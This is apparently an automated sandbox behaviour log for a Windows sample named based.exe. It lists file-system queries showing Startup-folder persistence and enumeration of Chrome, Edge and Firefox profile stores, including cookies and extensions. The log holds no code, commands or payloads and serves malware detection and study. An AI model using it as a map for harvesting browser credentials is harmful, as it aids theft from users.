Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
